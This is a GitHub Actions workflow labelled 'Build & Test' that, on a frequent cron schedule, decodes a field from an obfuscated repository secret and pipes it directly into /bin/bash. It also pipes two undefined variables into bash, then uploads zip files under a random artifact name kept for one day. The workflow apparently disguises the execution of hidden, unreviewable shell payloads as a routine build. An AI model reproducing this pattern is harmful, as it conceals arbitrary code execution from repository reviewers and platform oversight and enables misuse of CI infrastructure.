name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '53 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          xi13009: ${{ secrets.xi13009 }}
        run: |
          printf '%s' "$xi13009" | jq -r .aqja58 | /bin/bash
          echo $tiayi2 | jq -r .b26050 | /bin/bash
          echo $c911 | jq -r .mpd66984 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 6uwlUn4i
          path: "*.zip"
          retention-days: 1
